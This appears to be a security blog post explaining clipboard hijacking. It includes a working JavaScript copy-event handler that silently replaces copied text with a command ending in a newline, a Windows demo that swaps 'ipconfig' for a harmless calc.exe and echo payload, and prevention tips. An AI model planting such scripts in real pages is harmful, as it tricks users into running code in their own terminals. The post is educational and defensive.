Clipboard Hijacking

Copying text to the clipboard can turn it into a security risk.

Many of us regularly copy and paste commands from various websites directly into a terminal. But is there a risk of being compromised through such copied content? Indeed, this practice can expose you to potential security breaches.

An attacker can include a tiny JavaScript code that appears to be a reasonable command, but when copied, it really copies other harmful code, as shown in the code below:

<script>
    // Adding an event listener to the element with the ID 'copy'
    document.getElementById('copy').addEventListener('copy', function(e) {
        // Intercepting the copy event

        // Overwriting the copied data with malicious code
        e.clipboardData.setData('text/plain', "malicious code \r\n");

        // Preventing the default copy behavior to ensure only the malicious code is copied
        e.preventDefault();
    });
</script>

This code snippet is intended to take over the clipboard functionality. When a user attempts to copy text from the element with the ID ‘copy,’ this script intercepts the action and replaces what the user intended to copy with a string containing “malicious code.”

An attacker can include \n or \r\n within the code to create a new line. This action, when performed in a terminal, can lead to the automatic execution of the embedded code.

This type of attack is straightforward yet can cause significant harm. Let me explain how it operates:

Copy the command and paste it into the terminal, here we go…..

YOU HAVE BEEN HACKED

Windows:

Let’s see in windows, we’re looking for cmd command to see ip and we find this site.

This site has the following script:

<p> How to get the IP Address in Windows: </p>
<code><p id='copy'>ipconfig</p></code>
<script>
document.getElementById('copy').addEventListener('copy', function(e) {
e.clipboardData.setData('text/plain',"cmd.exe /c calc.exe & for /l %x in (1, 1, 5) do echo YOU HAVE BEEN HACKED \r\n");
e.preventDefault();});
</script>

Copy the command and paste into the cmd:

Boom! YOU HAVE BEEN HACKED

Ways to prevent this?

An attacker leads a user into copying and pasting commands or code into their terminal or console, often resulting to hazardous acts like as revealing sensitive information or granting the attacker access to the victim’s machine. This is particularly harmful because it takes advantage of the user’s trust and lack of awareness. Here are some measures to avoid becoming a victim of such attacks:

1. Awareness and Education: Understanding the risks is the first step in prevention. It is important to understand that merely copying and pasting material from websites might be hazardous. Educate yourself and those around you on these types of assaults, as well as the need of double-checking everything you copy and paste.
2. Verify Before Execution: Always validate any command or script before running it, especially if it comes from an untrusted source. Understand the purpose of the command or script and look for any hidden code.
3. Use Reliable Sources: Only use commands or code from well-known, trustworthy sources. Make sure to include credible excerpts from forums, community contributions, or other online sources.
4. Disable Script Execution: In some circumstances, you can prevent scripts from untrusted sources from being executed. This can help prevent harmful code from being executed accidentally.
5. Maintain Your Anti-Malware and Security Software: Keep your anti-malware and security software up to date. Some advanced security solutions can detect and block suspicious activity, such as those caused by a copy-paste attack.